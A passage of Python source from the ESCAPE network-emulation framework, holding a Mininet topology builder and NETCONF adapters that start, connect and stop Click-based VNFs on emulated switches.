implementation's nature.
Follows Builder design pattern.
"""
# Default initial options for Mininet
default_opts = {
"controller": InternalControllerProxy,
# Use own Controller
'build': False, # Not build during init
'inNamespace': False, # Not start element in namespace
'autoSetMacs': False, # Set simple MACs
'autoStaticArp': True, # Set static ARP entries
'listenPort': None, # Add listen port to OVS switches
'link': TCLink} # Add default link
"""Default initial options for Mininet"""
# Default internal storing format for NFFG parsing/reading from file
DEFAULT_NFFG_FORMAT = "NFFG"
"""Default internal storing format for NFFG parsing/reading from file"""
# Constants
TYPE_EE_LOCAL = "LOCAL"
TYPE_EE_REMOTE = "REMOTE"
# Constants for DPID generation
dpidBase = 1 # initial value for DPID generation
dpidLen = 16 # digits in dpid passed to switch
def __init__ (self, net=None, opts=None, fallback=True, run_dry=True):
"""
Initialize NetworkBuilder.
If the topology definition is not found, an exception will be raised or
an empty :class:`mininet.net.Mininet` topology will be created if
``run_dry`` is set.
:param net: update given Mininet object instead of creating a new one
:type net: :class:`mininet.net.Mininet`
:param opts: update default options with the given opts
:type opts: dict
:param fallback: search for fallback topology (default: True)
:type fallback: bool
:param run_dry: do not raise an Exception and return with bare Mininet obj.
:type run_dry: bool
:return: None
"""
self.opts = dict(self.default_opts)
if opts is not None:
self.opts.update(opts)
self.fallback = fallback
self.run_dry = run_dry
if net is not None:
if isinstance(net, Mininet):
# Initial settings - Create new Mininet object if necessary
self.mn = net
else:
raise TopologyBuilderException(
"Network object's type must be a derived class of Mininet!")
else:
# self.mn = Mininet(**self.opts)
try:
self.mn = MininetWithControlNet(**self.opts)
except KeyboardInterrupt:
quit_with_error(
msg="Assembly of Mininet network was interrupted by user!",
logger=log)
# Basically a wrapper for mn to offer helping functions
self.mn_bridge = None
# Cache of the topology description as an NFFG which is parsed during
# initialization
self.topo_desc = None
self.__dpid_cntr = self.dpidBase
def __get_new_dpid (self):
"""
Generate a new DPID and return the valid format for Mininet/OVS.
:return: new DPID
:rtype: str
"""
dpid = hex(int(self.__dpid_cntr))[2:]
dpid = '0' * (self.dpidLen - len(dpid)) + dpid
self.__dpid_cntr += 1
return dpid
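# Illustrative note (not in the original source): with dpidLen = 16 the
# counter value 1 yields '0000000000000001', the next call yields
# '0000000000000002', and so on -- a zero-padded 16-digit hex string as
# expected by Mininet/OVS.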
##############################################################################
# Topology initializer functions
##############################################################################
def __init_from_NFFG (self, nffg):
"""
Initialize topology from an :class:`NFFG` representation.
:param nffg: topology object structure
:type nffg: :class:`NFFG`
:return: None
"""
# pprint(nffg.network.__dict__)
log.info("Start topology creation from NFFG(name: %s)..." % nffg.name)
created_mn_nodes = {} # created nodes as 'NFFG-id': <node>
created_mn_links = {} # created links as 'NFFG-id': <link>
# If not set then cache the given NFFG as the topology description
self.topo_desc = nffg
# Create a Controller which will be the default internal POX controller
try:
self.create_Controller("ESCAPE")
except SystemExit:
raise TopologyBuilderException("Controller creations was unsuccessful!")
# Convert INFRAs
for infra in nffg.infras:
# Create EE
if infra.infra_type == NodeInfra.TYPE_EE:
if infra.domain == "INTERNAL":
ee_type = self.TYPE_EE_LOCAL
else:
log.warning(
"Detected domain of infra: %s is not INTERNAL! Remote EE creation "
"for domains other than INTERNAL is not supported yet!" % infra)
# ee_type = self.TYPE_EE_REMOTE
ee_type = self.TYPE_EE_LOCAL
# FIXME - set resource info in MN EE if can - cpu,mem,delay,bandwidth?
agt, sw = self.create_NETCONF_EE(name=infra.id, type=ee_type)
created_mn_nodes[infra.id] = sw
# Create Switch
elif infra.infra_type == NodeInfra.TYPE_SDN_SWITCH:
switch = self.create_Switch(name=infra.id)
created_mn_nodes[infra.id] = switch
elif infra.infra_type == NodeInfra.TYPE_STATIC_EE:
static_ee = self.create_static_EE(name=infra.id)
created_mn_nodes[infra.id] = static_ee
else:
quit_with_error(
msg="Type: %s in %s is not supported by the topology creation "
"process in %s!" % (
infra.infra_type, infra, self.__class__.__name__), logger=log)
# Create SAPs - skip the temporary, inter-domain SAPs
for sap in {s for s in nffg.saps if not s.binding}:
# Create SAP
sap_host = self.create_SAP(name=sap.id)
created_mn_nodes[sap.id] = sap_host
# Convert VNFs
# TODO - implement --> currently the default Mininet topology does not
# TODO contain NFs but it could be possible
# Convert connections - copy link ref in a list and iter over it
for edge in [l for l in nffg.links]:
# Skip initiation of links which connected to an inter-domain SAP
if (edge.src.node.type == NFFG.TYPE_SAP and
edge.src.node.binding is not None) or (
edge.dst.node.type == NFFG.TYPE_SAP and
edge.dst.node.binding is not None):
continue
# Create Links
mn_src_node = created_mn_nodes.get(edge.src.node.id)
mn_dst_node = created_mn_nodes.get(edge.dst.node.id)
if mn_src_node is None or mn_dst_node is None:
raise TopologyBuilderException(
"Created topology node is missing! Something really went wrong!")
src_port = int(edge.src.id) if int(edge.src.id) < 65535 else None
if src_port is None:
log.warning(
"Source port id of Link: %s is generated dynamically! Using "
"automatic port assignment based on internal Mininet "
"implementation!" % edge)
dst_port = int(edge.dst.id) if int(edge.dst.id) < 65535 else None
if dst_port is None:
log.warning(
"Destination port id of Link: %s is generated dynamically! Using "
"automatic port assignment based on internal Mininet "
"implementation!" % edge)
link = self.create_Link(src=mn_src_node, src_port=src_port,
dst=mn_dst_node, dst_port=dst_port,
bw=edge.bandwidth, delay=str(edge.delay) + 'ms')
created_mn_links[edge.id] = link
# Set port properties of SAP nodes.
# A possible excerpt from an escape-mn-topo.nffg file:
# "ports": [{ "id": 1,
# "property": ["ip:10.0.10.1/24"] }]
#
for n in {s for s in nffg.saps if not s.binding}:
mn_node = self.mn.getNodeByName(n.id)
for port in n.ports:
# ip should be something like '10.0.123.1/24'.
if len(port.l3):
if len(port.l3) == 1:
ip = port.l3.container[0].provided
else:
log.warning(
"Multiple L3 address is detected! Skip explicit IP address "
"definition...")
ip = None
else:
# or None
ip = port.get_property('ip')
if port.l2:
mac = port.l2
else:
mac = port.get_property('mac')
intf = mn_node.intfs.get(port.id)
if intf is None:
log.warning(("Port %s of node %s is not connected, "
"it will remain unconfigured!") % (port.id, n.name))
continue
if intf == mn_node.defaultIntf():
# Workaround a bug in Mininet
mn_node.params.update({'ip': ip})
mn_node.params.update({'mac': mac})
if ip is not None:
mn_node.setIP(ip, intf=intf)
log.debug("Use explicit IP: %s for node: %s" % (ip, n))
if mac is not None:
mn_node.setMAC(mac, intf=intf)
log.debug("Use explicit MAC: %s for node: %s" % (mac, n))
# For inter-domain SAPs no need to create host/xterm just add the SAP as
# a port to the border Node
# Iterate inter-domain SAPs
self.bind_inter_domain_SAPs(nffg=nffg)
log.info("Topology creation from NFFG has been finished!")
def __init_from_AbstractTopology (self, topo_class):
"""
Build topology from pre-defined Topology class.
:param topo_class: topology
:type topo_class: :any:`AbstractTopology`
:return: None
"""
log.info("Load topology from class: %s" % topo_class.__name__)
if topo_class.TYPE == "STATIC":
self.mn.topo = topo_class().construct()
self.mn.build()
elif topo_class.TYPE == "DYNAMIC":
# self.mn = topo_class().construct()
topo_class().construct(builder=self)
else:
raise TopologyBuilderException(
"TYPE field of the Topology class need to be set!")
self.topo_desc = topo_class.get_topo_desc()
def __init_from_CONFIG (self, format=DEFAULT_NFFG_FORMAT):
"""
Build a pre-defined topology from an NFFG stored in a file.
The file path is searched in CONFIG with the name ``TOPO``.
:param format: NF-FG storing format (default: internal NFFG representation)
:type format: str
:return: None
"""
path = CONFIG.get_mininet_topology()
if path is None:
raise TopologyBuilderException("Missing Topology!")
self.__init_from_file(path=path, format=format)
def __init_from_file (self, path, format=DEFAULT_NFFG_FORMAT):
"""
Build a pre-defined topology from an NFFG stored in the file given by
``path``.
:param path: file path
:type path: str
:param format: NF-FG storing format (default: internal NFFG representation)
:type format: str
:return: None
"""
if path is None:
log.error("Missing file path of Topology description")
return
try:
with open(path) as f:
log.info("Load topology from file: %s" % path)
if format == self.DEFAULT_NFFG_FORMAT:
log.debug("Using file format: %s" % format)
self.__init_from_NFFG(nffg=NFFG.parse(f.read()))
else:
raise TopologyBuilderException("Unsupported file format: %s!" %
format)
except IOError:
log.warning("Additional topology file not found: %s" % path)
raise TopologyBuilderException("Missing topology file!")
except ValueError as e:
log.error("An error occurred when load topology from file: %s" %
e.message)
raise TopologyBuilderException("File parsing error!")
# except SystemExit:
# raise TopologyBuilderException("Got exit exception from Mininet!")
def get_network (self):
"""
Return the bridge to the constructed network.
:return: object representing the emulated network
:rtype: :any:`ESCAPENetworkBridge`
"""
if self.mn_bridge is None:
# Create the Interface object and set the topology description as the
# original NFFG
self.mn_bridge = ESCAPENetworkBridge(network=self.mn,
topo_desc=self.topo_desc)
# Additional settings
self.mn_bridge._need_clean = CONFIG.get_clean_after_shutdown()
return self.mn_bridge
##############################################################################
# Builder functions
##############################################################################
def create_static_EE (self, name, cls=None, **params):
"""
Create and add a new EE to Mininet in the static way.
This function exists only for backward compatibility.
.. warning::
Not tested yet!
:param name: name of the Execution Environment
:type name: str
:param cls: custom EE class/constructor (optional)
:type cls: :class:`mininet.node.EE`
:param cores: Specify (real) cores that our cgroup can run on (optional)
:type cores: list
:param frac: Set overall CPU fraction for this EE (optional)
:type frac: list
:param vlanif: set vlan interfaces (optional)
:type vlanif: list
:return: newly created EE object
:rtype: :class:`mininet.node.EE`
"""
# create static EE
cfg = CONFIG.get_EE_params()
cfg.update(params)
cfg['dpid'] = self.__get_new_dpid()
log.debug("Create static EE with name: %s" % name)
ee = self.mn.addEE(name=name, cls=cls, **cfg)
if 'cores' in cfg:
ee.setCPUs(**cfg['cores'])
if 'frac' in cfg:
ee.setCPUFrac(**cfg['frac'])
if 'vlanif' in cfg:
for vif in cfg['vlanif']:
ee.cmdPrint('vconfig add ' + name + '-eth0 ' + vif[1])
ee.cmdPrint('ifconfig ' + name + '-eth0.' + vif[1] + ' ' + vif[0])
return ee
def create_NETCONF_EE (self, name, type=TYPE_EE_LOCAL, **params):
"""
Create and add a new EE to Mininet network.
The type of EE can be {local|remote} NETCONF-based.
:param name: name of the EE (the switch gets ``name``, the agent gets ``agt_`` + ``name``)
:type name: str
:param type: type of EE {local|remote}
:type type: str
:param opts: additional options for the switch in EE
:type opts: str
:param dpid: remote switch DPID (remote only)
:param username: NETCONF username (remote only)
:param passwd: NETCONF password (remote only)
:param ip: control Interface for the agent (optional)
:param agentPort: port to listen on for NETCONF connections, (else set \
automatically)
:param minPort: first VNF control port which can be used (else set \
automatically)
:param cPort: number of VNF control ports (and VNFs) which can be used ( \
default: 10)
:return: tuple of newly created :class:`mininet.node.Agent` and \
:class:`mininet.node.Switch` object
:rtype: tuple
"""
type = type.upper()
cfg = CONFIG.get_EE_params()
cfg.update(params)
cfg['dpid'] = self.__get_new_dpid()
if type == self.TYPE_EE_LOCAL:
# create local NETCONF-based
log.debug("Create local NETCONF EE with name: %s" % name)
sw = self.mn.addSwitch(name, **cfg)
elif type == self.TYPE_EE_REMOTE:
# create remote NETCONF-based
log.debug("Create remote NETCONF EE with name: %s" % name)
cfg["inNamespace"] = False
sw = self.mn.addRemoteSwitch(name, cls=None, **cfg)
else:
raise TopologyBuilderException(
"Unsupported NETCONF-based EE type: %s!" % type)
agt = self.mn.addAgent('agt_' + name, cls=None, **cfg)
agt.setSwitch(sw)
return agt, sw
def create_Switch (self, name, cls=None, **params):
"""
Create and add a new OF switch instance to Mininet network.
Additional parameters are keyword arguments that depend on, and are
forwarded to, the initiated Switch class type.
:param name: name of switch
:type name: str
:param cls: custom switch class/constructor (optional)
:type cls: :class:`mininet.node.Switch`
:param dpid: DPID for switch (default: derived from name)
:type dpid: str
:param opts: additional switch options
:type opts: str
:param listenPort: custom listening port (optional)
:type listenPort: int
:param inNamespace: override the switch spawn in namespace (optional)
:type inNamespace: bool
:param of_ver: override OpenFlow version (optional)
:type of_ver: int
:param ip: set IP address for the switch (optional)
:type ip: str
:return: newly created Switch object
:rtype: :class:`mininet.node.Switch`
"""
log.debug("Create Switch with name: %s" % name)
cfg = CONFIG.get_Switch_params()
cfg.update(params)
cfg['dpid'] = self.__get_new_dpid()
sw = self.mn.addSwitch(name=name, cls=cls, **cfg)
if 'of_ver' in cfg:
sw.setOpenFlowVersion(cfg['of_ver'])
if 'ip' in cfg:
sw.setSwitchIP(cfg['ip'])
return sw
def create_Controller (self, name, controller=None, **params):
"""
Create and add a new OF controller to Mininet network.
Additional parameters are keyword arguments that depend on, and are
forwarded to, the initiated Controller class type.
.. warning::
This function should not be called directly; use the default InternalControllerProxy instead!
:param name: name of controller
:type name: str
:param controller: custom controller class/constructor (optional)
:type controller: :class:`mininet.node.Controller`
:param inNamespace: override the controller spawn in namespace (optional)
:type inNamespace: bool
:return: newly created Controller object
:rtype: :class:`mininet.node.Controller`
"""
log.debug("Create Controller with name: %s" % name)
cfg = CONFIG.get_Controller_params()
cfg.update(params)
return self.mn.addController(name=name, controller=controller, **cfg)
def create_SAP (self, name, cls=None, **params):
"""
Create and add a new SAP to Mininet network.
Additional parameters are keyword arguments that depend on, and are
forwarded to, the initiated Host class type.
:param name: name of SAP
:type name: str
:param cls: custom hosts class/constructor (optional)
:type cls: :class:`mininet.node.Host`
:return: newly created Host object as the SAP
:rtype: :class:`mininet.node.Host`
"""
log.debug("Create SAP with name: %s" % name)
cfg = CONFIG.get_SAP_params()
cfg.update(params)
return self.mn.addHost(name=name, cls=cls, **cfg)
def bind_inter_domain_SAPs (self, nffg):
"""
Search for inter-domain SAPs in the given :class:`NFFG`, create them as
switch ports and bind them to the physical interface given in the SAP's
``binding`` attribute.
:param nffg: topology description
:type nffg: :class:`NFFG`
:return: None
"""
log.debug("Search for inter-domain SAPs...")
# Create the inter-domain SAP ports
for sap in {s for s in nffg.saps if s.binding is not None}:
# NFFG is the raw NFFG without link duplication --> iterating over every
# in/out edge; there should be only one link in this case
# e = (u, v, data)
sap_switch_links = [e for e in
nffg.network.edges_iter(data=True) if sap.id in e]
try:
if sap_switch_links[0][0] == sap.id:
border_node = sap_switch_links[0][1]
else:
border_node = sap_switch_links[0][0]
except IndexError:
log.error("Link for inter-domain SAP: %s is not found. "
"Skip SAP creation..." % sap)
continue
log.debug("Detected inter-domain SAP: %s connected to border Node: %s" %
(sap, border_node))
# if sap.delay or sap.bandwidth:
# log.debug("Detected resource values for inter-domain connection: "
# "delay: %s, bandwidth: %s" % (sap.delay, sap.bandwidth))
sw_name = nffg.network.node[border_node].id
for sw in self.mn.switches:
# print sw.name
if sw.name == sw_name:
if sap.binding not in get_ifaces():
log.warning(
"Physical interface: %s is not found! Skip binding..."
% sap.binding)
continue
log.debug("Add physical port as inter-domain SAP: %s -> %s" %
(sap.binding, sap.id))
# Add interface to border switch in Mininet
# os.system('ovs-vsctl add-port %s %s' % (sw_name, sap.domain))
sw.addIntf(intf=Intf(name=sap.binding, node=sw))
def create_Link (self, src, dst, src_port=None, dst_port=None, **params):
"""
Create an undirected connection between src and dst.
Source and destination ports can be given optionally.
:param src: source Node
:param dst: destination Node
:param src_port: source Port (optional)
:param dst_port: destination Port (optional)
:param params: additional link parameters
:return: None
"""
log.debug("Create Link %s%s <--> %s%s" % (
src, ":%s" % src_port if src_port is not None else "", dst,
":%s" % dst_port if dst_port is not None else ""))
remote = filter(lambda n: isinstance(n, RemoteSwitch), [src, dst])
local = filter(lambda n: not isinstance(n, RemoteSwitch), [src, dst])
cfg = CONFIG.get_Link_params()
cfg.update(params)
if not remote:
self.mn.addLink(src, dst, src_port, dst_port, **cfg)
else:
# sw = local[0] # one of the local Node
# r = remote[0] # other Node which is the remote
# intfName = r.params['local_intf_name']
# r_mac = None # unknown, r.params['remote_mac']
# r_port = r.params['remote_port']
# # self._debug('\tadd hw interface (%s) to node (%s)' % (intfName,
# # sw.name))
# # This hack avoids calling __init__ which always makeIntfPair()
# link = Link.__new__(Link)
# i1 = Intf(intfName, node=sw, link=link)
# i2 = Intf(intfName, node=r, mac=r_mac, port=r_port, link=link)
# i2.mac = r_mac # mn runs 'ifconfig', which resets mac to None
# link.intf1, link.intf2 = i1, i2
raise TopologyBuilderException(
"Remote Link creation is not supported yet!")
def build (self, topo=None):
"""
Initialize network.
1. If the additional ``topology`` is given then using that for init.
2. If TOPO is not given, search topology description in CONFIG with the \
name 'TOPO'.
3. If TOPO not found or an Exception was raised, search for the fallback \
topo with the name ``FALLBACK-TOPO``.
4. If FALLBACK-TOPO not found raise an exception or run a bare Mininet \
object if the run_dry attribute is set
:param topo: optional topology representation
:type topo: :class:`NFFG` or :any:`AbstractTopology` or ``None``
:return: object representing the emulated network
:rtype: :any:`ESCAPENetworkBridge`
"""
log.debug("Init emulated topology based on Mininet v%s" % MNVERSION)
remove_junks_at_boot(log=log)
# Load topology
try:
if topo is None:
log.debug("Get Topology description from CONFIG...")
self.__init_from_CONFIG()
elif isinstance(topo, NFFG):
log.debug("Get Topology description from given NFFG...")
self.__init_from_NFFG(nffg=topo)
elif isinstance(topo, basestring) and topo.startswith('/'):
log.debug("Get Topology description from given file...")
self.__init_from_file(path=topo)
elif isinstance(topo, AbstractTopology):
log.debug("Get Topology description based on Topology class...")
self.__init_from_AbstractTopology(topo_class=topo)
else:
raise TopologyBuilderException(
"Unsupported topology format: %s - %s" % (type(topo), topo))
return self.get_network()
except SystemExit as e:
quit_with_error(msg="Mininet exited unexpectedly!", logger=log,
exception=e)
except TopologyBuilderException:
try:
if self.fallback:
# Search for fallback topology
fallback = CONFIG.get_fallback_topology()
if fallback:
log.info("Load topo from fallback topology description...")
self.__init_from_AbstractTopology(fallback)
return self.get_network()
except SystemExit as e:
quit_with_error(msg="Mininet exited unexpectedly!", logger=log,
exception=e)
# fallback topo is not found or set
if self.run_dry:
# Return with the bare Mininet object
log.warning("Topology description is not found! Running dry...")
return self.get_network()
else:
# Re-raise the exception
raise
except KeyboardInterrupt:
quit_with_error(
msg="Assembly of Mininet network was interrupted by user!",
logger=log)
```
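The builder above is normally driven by the Infrastructure Layer rather than called by hand. The following minimal sketch only illustrates the intended call order (construct the builder, `build()`, then start/stop through the returned bridge); the import path and the surrounding ESCAPE/POX runtime (a loaded `CONFIG`, root privileges for Mininet) are assumptions, so treat it as an illustration rather than a verified standalone script.
```python
# Hypothetical usage sketch of ESCAPENetworkBuilder / ESCAPENetworkBridge.
# Assumes an initialized ESCAPE environment (CONFIG loaded, run as root).
from escape.infr.topology import ESCAPENetworkBuilder  # assumed module path


def run_emulation (topo=None):
  # build() resolves the topology source in order:
  # given topo -> CONFIG 'TOPO' entry -> fallback topology -> bare Mininet
  builder = ESCAPENetworkBuilder(fallback=True, run_dry=True)
  bridge = builder.build(topo=topo)  # returns an ESCAPENetworkBridge
  bridge.start_network()  # boots Mininet and opens the SAP xterms
  try:
    # ... emulation runs here; adapters install NFs and flowrules ...
    pass
  finally:
    bridge.stop_network()  # stops Mininet and schedules cleanup if configured
```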
#### File: escape/infr/topo_manager.py
```python
import pprint
import re
from ncclient import NCClientError
from ncclient.operations import OperationError
from ncclient.operations.rpc import RPCError
from ncclient.transport import TransportError
from escape.adapt import log
from escape.infr.il_API import InfrastructureLayerAPI
from escape.nffg_lib import NFFG
from escape.util.conversion import NFFGConverter
from escape.util.domain import AbstractESCAPEAdapter, VNFStarterAPI, \
AbstractDomainManager, DomainChangedEvent
from escape.util.misc import VERBOSE
from escape.util.netconf import AbstractNETCONFAdapter
from pox.lib.util import dpid_to_str
class VNFStarterAdapter(AbstractNETCONFAdapter, AbstractESCAPEAdapter,
VNFStarterAPI):
"""
This class is devoted to provide NETCONF specific functions for vnf_starter
module. Documentation is transferred from `vnf_starter.yang`.
This class is devoted to start and stop CLICK-based VNFs that will be
connected to a mininet switch.
Follows the MixIn design pattern approach to support NETCONF functionality.
"""
# RPC namespace
RPC_NAMESPACE = u'http://csikor.tmit.bme.hu/netconf/unify/vnf_starter'
# Adapter name used in CONFIG and ControllerAdapter class
name = "VNFStarter"
type = AbstractESCAPEAdapter.TYPE_MANAGEMENT
def __init__ (self, *args, **kwargs):
"""
Init.
:param server: server address
:type server: str
:param port: port number
:type port: int
:param username: username
:type username: str
:param password: password
:type password: str
:param timeout: connection timeout (default=30)
:type timeout: int
:return: None
"""
# Call base constructors directly to avoid super() and MRO traps
AbstractNETCONFAdapter.__init__(self, *args, **kwargs)
AbstractESCAPEAdapter.__init__(self, *args, **kwargs)
log.debug(
"Init VNFStarterAdapter - type: %s, params: %s" % (self.type, kwargs))
def check_domain_reachable (self):
"""
Checker function for domain polling.
:return: the domain is detected or not
:rtype: bool
"""
try:
return self.get(expr="vnf_starter/agent_name") is not None
except:
# in case of RPCError, TransportError, OperationError
return False
def get_topology_resource (self):
"""
Return with the topology description as an :class:`NFFG`.
:return: the emulated topology description
:rtype: :class:`NFFG`
"""
raise RuntimeError("VNFStarterAdapter does not support this function: "
"get_topology_resource() !")
def update_connection_params (self, **kwargs):
"""
Update connection params.
:return: only updated params
:rtype: dict
"""
for param in ('server', 'port', 'username', 'password'):
if param in kwargs:
if kwargs[param] == getattr(self, param):
del kwargs[param]
else:
setattr(self, param, kwargs[param])
return kwargs
def _invoke_rpc (self, request_data):
"""
Override parent function to catch and log exceptions gracefully.
:return: None
"""
try:
return super(VNFStarterAdapter, self)._invoke_rpc(request_data)
except NCClientError as e:
log.error("Failed to invoke NETCONF based RPC! Cause: %s", e)
raise
##############################################################################
# RPC calls starts here
##############################################################################
def initiateVNF (self, vnf_type, vnf_description=None, options=None):
"""
This RPC will start a VNF.
0. initiate new VNF (initiate datastructure, generate unique ID)
1. set its arguments (control port, control ip, and VNF type/command)
2. returns the connection data, of which the vnf_id is the most important
Reply structure:
.. code-block:: json
{
"access_info":
{
"vnf_id": "<mandatory>",
"control_ip": "<optional>",
"control_port": "<optional>"
},
"other": "<optional>"
}
:param vnf_type: pre-defined VNF type (see in vnf_starter/available_vnfs)
:type vnf_type: str
:param vnf_description: Click description if there are no pre-defined type
:type vnf_description: str
:param options: unlimited list of additional options as name-value pairs
:type options: collections.OrderedDict
:return: RPC reply data
:rtype: dict
:raises: RPCError, OperationError, TransportError
"""
log.debug("Call initiateVNF - VNF type: %s" % vnf_type)
return self.call_RPC("initiateVNF", vnf_type=vnf_type,
vnf_description=vnf_description, options=options)
def connectVNF (self, vnf_id, vnf_port, switch_id):
"""
This RPC will practically start and connect the initiated VNF/CLICK to
the switch.
0. create virtualEthernet pair(s)
1. connect either end of it (them) to the given switch(es)
Reply structure:
.. code-block:: json
{
"port": "<mandatory> # Currently just got RPC OK",
"other": "<optional>"
}
This RPC is also used for reconnecting a VNF. In this case, however,
if the input fields are not correctly set, an error occurs.
:param vnf_id: VNF ID (mandatory)
:type vnf_id: str
:param vnf_port: VNF port (mandatory)
:type vnf_port: str or int
:param switch_id: switch ID (mandatory)
:type switch_id: str
:return: Returns the connected port(s) with the corresponding switch(es).
:rtype: dict
:raises: RPCError, OperationError, TransportError
"""
log.debug("Call connectVNF - VNF id: %s port: %s --> node: %s" % (
vnf_id, vnf_port, switch_id))
return self.call_RPC("connectVNF", vnf_id=vnf_id, vnf_port=vnf_port,
switch_id=switch_id)
def disconnectVNF (self, vnf_id, vnf_port):
"""
This RPC will disconnect the VNF(s)/CLICK(s) from the switch(es).
0. ip link set uny_0 down
1. ip link set uny_1 down
2. (if more ports) repeat 0. and 1. with the corresponding data
Reply structure:
.. code-block:: json
{
"other": "<optional> # Currently just got RPC OK"
}
:param vnf_id: VNF ID (mandatory)
:type vnf_id: str
:param vnf_port: VNF port (mandatory)
:type vnf_port: str
:return: reply data
:rtype: dict
:raises: RPCError, OperationError, TransportError
"""
log.debug("Call disconnectVNF - VNF id: %s port: %s" % (vnf_id, vnf_port))
return self.call_RPC("disconnectVNF", vnf_id=vnf_id, vnf_port=vnf_port)
def startVNF (self, vnf_id):
"""
This RPC will actually start the VNF/CLICK instance.
Reply structure:
.. code-block:: json
{
"other": "<optional> # Currently just got RPC OK"
}
:param vnf_id: VNF ID (mandatory)
:type vnf_id: str
:return: reply data
:rtype: dict
:raises: RPCError, OperationError, TransportError
"""
log.debug("Call startVNF - VNF id: %s" % vnf_id)
return self.call_RPC("startVNF", vnf_id=vnf_id)
def stopVNF (self, vnf_id):
"""
This RPC will gracefully shut down the VNF/CLICK instance.
0. if disconnect() was not called before, we call it
1. delete virtual ethernet pairs
2. stop (kill) click
3. remove vnf's data from the data structure
Reply structure:
.. code-block:: json
{
"other": "<optional> # Currently just got RPC OK"
}
:param vnf_id: VNF ID (mandatory)
:type vnf_id: str
:return: reply data
:rtype: dict
:raises: RPCError, OperationError, TransportError
"""
log.debug("Call stopVNF - VNF id: %s" % vnf_id)
return self.call_RPC("stopVNF", vnf_id=vnf_id)
def getVNFInfo (self, vnf_id=None):
"""
This RPC will send back all data of all VNFs that have been initiated by
this NETCONF Agent. If an input of vnf_id is set, only that VNF's data
will be sent back. Most of the data this RPC returns is used for DEBUG;
however, 'status' is useful for indicating to upper layers whether a VNF
is UP_AND_RUNNING.
Reply structure:
.. code-block:: json
{
"initiated_vnfs":
{
"vnf_id": "<initiated_vnfs key>",
"pid": "<VNF PID>",
"control_ip": "<cntr IP>",
"control_port": "<cntr port>",
"command": "<VNF init command>",
"link":
[
{
"vnf_port": "<port of VNF end>",
"vnf_dev": "<VNF end intf>",
"vnf_dev_mac": "<VNF end MAC address>",
"sw_dev": "<switch/EE end intf>",
"sw_id": "<switch/EE end id>",
"sw_port": "<switch/EE end port>",
"connected": "<conn status>"
}
],
"other": "<optional>"
}
}
:param vnf_id: VNF ID (default: list info about all VNF)
:type vnf_id: str
:return: reply data
:rtype: dict
:raises: RPCError, OperationError, TransportError
"""
log.debug(
"Call getVNFInfo - VNF id: %s" % vnf_id if vnf_id is not None else "all")
return self.call_RPC('getVNFInfo', vnf_id=vnf_id)
##############################################################################
# High-level helper functions
##############################################################################
def deployNF (self, nf_type, nf_ports, infra_id, nf_desc=None, nf_opt=None):
"""
Initiate and start the given NF using the general RPC calls.
:param nf_type: pre-defined NF type (see in vnf_starter/available_vnfs)
:type nf_type: str
:param nf_ports: NF port number or list of ports (mandatory)
:type nf_ports: str or int or tuple
:param infra_id: id of the base node (mandatory)
:type infra_id: str
:param nf_desc: Click description if there are no pre-defined type
:type nf_desc: str
:param nf_opt: unlimited list of additional options as name-value pairs
:type nf_opt: collections.OrderedDict
:return: initiated NF description parsed from RPC reply
:rtype: dict
"""
with self as adapter:
try:
# Initiate VNF
reply = adapter.initiateVNF(vnf_type=nf_type, vnf_description=nf_desc,
options=nf_opt)
# Get created VNF's id
vnf_id = reply['access_info']['vnf_id']
# Connect VNF to the given Container
if isinstance(nf_ports, (tuple, list)):
for port in nf_ports:
adapter.connectVNF(vnf_id=vnf_id, vnf_port=port, switch_id=infra_id)
else:
adapter.connectVNF(vnf_id=vnf_id, vnf_port=nf_ports,
switch_id=infra_id)
# Start Click-based VNF
adapter.startVNF(vnf_id=vnf_id)
# Return with whole VNF description
return adapter.getVNFInfo(vnf_id=vnf_id)
except RPCError:
log.error("Got Error during deployVNF through NETCONF:")
raise
except KeyError as e:
log.warning(
"Missing required attribute from NETCONF-based RPC reply: %s! Skip "
"VNF initiation." % e.args[0])
except (TransportError, OperationError) as e:
log.error(
"Failed to deploy NF due to a connection error! Cause: %s" % e)
def removeNF (self, vnf_id):
"""
Stop and remove the given NF using the general RPC calls.
:return: reply data
:rtype: dict
"""
with self as adapter:
try:
# Stop and remove VNF
return adapter.stopVNF(vnf_id=vnf_id)
except RPCError:
log.error("Got Error during removeVNF through NETCONF:")
raise
except KeyError as e:
log.warning(
"Missing required attribute from NETCONF-based RPC reply: %s! Skip "
"VNF initiation." % e.args[0])
except (TransportError, OperationError) as e:
log.error(
"Failed to remove NF due to a connection error! Cause: %s" % e)
class InternalMininetAdapter(AbstractESCAPEAdapter):
"""
Adapter class to handle communication with Mininet domain.
Implement VNF managing API using direct access to the
:class:`mininet.net.Mininet` object.
"""
# Events raised by this class
_eventMixin_events = {DomainChangedEvent}
name = "MININET"
type = AbstractESCAPEAdapter.TYPE_TOPOLOGY
def __init__ (self, net=None, *args, **kwargs):
"""
Init.
:param net: set pre-defined network (optional)
:type net: :class:`ESCAPENetworkBridge`
"""
# Call base constructors directly to avoid super() and MRO traps
AbstractESCAPEAdapter.__init__(self, *args, **kwargs)
log.debug(
"Init InternalMininetAdapter - type: %s, domain: %s, initial network: "
"%s" % (self.type, self.domain_name, net))
if not net:
from pox import core
if core.core.hasComponent(InfrastructureLayerAPI._core_name):
# reference to MN --> ESCAPENetworkBridge
self.__IL_topo_ref = core.core.components[
InfrastructureLayerAPI._core_name].topology
if self.__IL_topo_ref is None:
log.error("Unable to get emulated network reference!")
def get_mn_wrapper (self):
"""
Return the specific wrapper for :class:`mininet.net.Mininet` object
represents the emulated network.
:return: emulated network wrapper
:rtype: :any:`ESCAPENetworkBridge`
"""
return self.__IL_topo_ref
def check_domain_reachable (self):
"""
Checker function for domain polling.
:return: the domain is detected or not
:rtype: bool
"""
# Direct access to IL's Mininet wrapper <-- Internal Domain
return self.__IL_topo_ref.started
def get_topology_resource (self):
"""
Return with the topology description as an :class:`NFFG`.
:return: the emulated topology description
:rtype: :class:`NFFG`
"""
# Direct access to IL's Mininet wrapper <-- Internal Domain
return self.rewrite_domain(
self.__IL_topo_ref.topo_desc) if self.__IL_topo_ref.started else None
def get_agent_connection_params (self, ee_name):
"""
Return the connection parameters for the agent of the container Node given
by ``ee_name``.
:param ee_name: name of the container Node
:type ee_name: str
:return: connection params
:rtype: dict
"""
agent = self.__IL_topo_ref.get_agent_to_switch(ee_name)
return {"server": "127.0.0.1", "port": agent.agentPort,
"username": agent.username,
"password": <PASSWORD>} if agent is not None else {}
class InternalDomainManager(AbstractDomainManager):
"""
Manager class to handle communication with internally emulated network.
.. note::
Uses :class:`InternalMininetAdapter` for managing the emulated network and
:class:`InternalPOXAdapter` for controlling the network.
.. deprecated::
